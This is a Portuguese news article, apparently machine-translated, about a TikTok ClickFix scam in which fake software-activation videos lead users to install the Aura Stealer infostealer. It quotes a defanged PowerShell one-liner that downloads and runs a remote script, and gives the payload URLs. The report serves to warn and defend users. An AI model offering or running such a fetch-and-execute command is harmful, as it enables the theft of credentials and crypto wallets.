Dataconomy PT
Subscribe
No Result
View All Result
Dataconomy PT
Subscribe
No Result
View All Result
Dataconomy PT
No Result
View All Result

O último golpe do TikTok ensina os usuários como infectar seus próprios PCs

byEmre Çıtak
20 Outubro 2025
in Cibersegurança, Notícias
Home Notícias Cibersegurança
Share on FacebookShare on Twitter
Google Preferred Source

Os cibercriminosos estão distribuindo malware para roubo de informações no TikTok usando vídeos disfarçados de guias de ativação de software gratuito. De acordo com BipandoComputadoro manipulador do ISC Xavier Mertens identificou a campanha em andamento, que emprega um método de engenharia social conhecido como ataque ClickFix para infectar sistemas de computador. Os vídeos, observados por BipandoComputadorafirmam fornecer instruções para ativar software legítimo, como Windows, Microsoft 365, Adobe Premiere, Photoshop, CapCut Pro e Discord Nitro. A campanha também promove serviços fictícios, incluindo “Netflix Premium” e “Spotify Premium”. Mertens observou que esta atividade é basicamente igual a uma campanha observada anteriormente pela empresa de segurança Trend Micro em maio. Os vídeos usam uma técnica de engenharia social que apresenta uma solução aparentemente válida ou um conjunto de instruções para enganar os usuários e fazê-los comprometer suas próprias máquinas. Este ataque ClickFix engana os usuários para que executem comandos maliciosos do PowerShell. Cada vídeo exibe um comando de uma linha, como `iex (irm slmgr[.]win/photoshop)` e instrui os visualizadores a executá-lo com privilégios de administrador. O nome do programa na URL é modificado para corresponder ao software que está sendo representado; um guia falso do Windows usaria um URL contendo “windows” em vez de “photoshop”. Quando o comando é executado, o PowerShell se conecta ao site remoto `slmgr[.]win` para recuperar e executar outro script do PowerShell. Este script baixa dois executáveis ​​das páginas da Cloudflare. O primeiro, de `https://file-epq[.]páginas[.]dev/updater.exe`, é uma variante do malware Aura Stealer. Este infostealer foi projetado para coletar credenciais de navegador salvas, cookies de autenticação, dados de carteira de criptomoeda e outras credenciais de aplicativos. Os dados roubados são então enviados aos invasores, concedendo-lhes acesso às contas da vítima. Uma segunda carga útil, `source.exe`, também é baixada como parte do ataque. De acordo com Mertens, este executável auto-compila o código usando o Visual C# Compiler integrado do .NET (`csc.exe`). O código resultante é posteriormente injetado e lançado diretamente na memória. O propósito específico desta carga adicional permanece obscuro. Os usuários que executaram essas etapas devem considerar todas as suas credenciais comprometidas. A ação recomendada é redefinir imediatamente as senhas de todos os sites e serviços que eles usam para evitar acesso não autorizado à conta e posterior roubo de dados. Os ataques ClickFix se tornaram populares no ano passado e são usados ​​para distribuir vários tipos de malware em campanhas de ransomware e roubo de criptomoedas. Como regra geral, os usuários nunca devem copiar texto de um site e executá-lo em uma caixa de diálogo do sistema operacional. Este comunicado inclui a barra de endereços do File Explorer, o prompt de comando, os prompts do PowerShell, o terminal macOS e os shells do Linux.


Crédito da imagem em destaque

Tags: fraudetiktok

Related Posts

Amazon lança display adaptável para Fire TV

Amazon lança display adaptável para Fire TV

21 Julho 2026
NVIDIA lança servidores de IA refrigerados a água quente

NVIDIA lança servidores de IA refrigerados a água quente

21 Julho 2026
Samsung Galaxy Watch Ultra 2 renderiza vazamento

Samsung Galaxy Watch Ultra 2 renderiza vazamento

21 Julho 2026
Google supostamente desenvolve chip Frozen v2 para Gemini AI

Google supostamente desenvolve chip Frozen v2 para Gemini AI

21 Julho 2026
X lança aplicativo Android redesenhado com desempenho mais rápido

X lança aplicativo Android redesenhado com desempenho mais rápido

21 Julho 2026
TikTok testa ferramenta de IA para detectar personificação deepfake

TikTok testa ferramenta de IA para detectar personificação deepfake

20 Julho 2026

Recent Posts

  • Startup revela modelo de IA construído em osciladores e pode reduzir o uso de energia em 1.000 vezes
  • Juiz suspende fusão Paramount-WBD por 14 dias
  • Juiz aprova acordo de direitos autorais de US$ 1,5 bilhão da Anthropic
  • Amazon lança display adaptável para Fire TV
  • Samsung lança cartão de crédito Galaxy com recompensas em dinheiro de até 10%

Recent Comments

Nenhum comentário para mostrar.
Dataconomy PT

COPYRIGHT © DATACONOMY MEDIA GMBH, ALL RIGHTS RESERVED.

  • Sample Page

Follow Us

  • Sample Page
No Result
View All Result
Subscribe

This website uses cookies to improve your experience. You can choose to accept or reject them. Visit our Privacy Policy.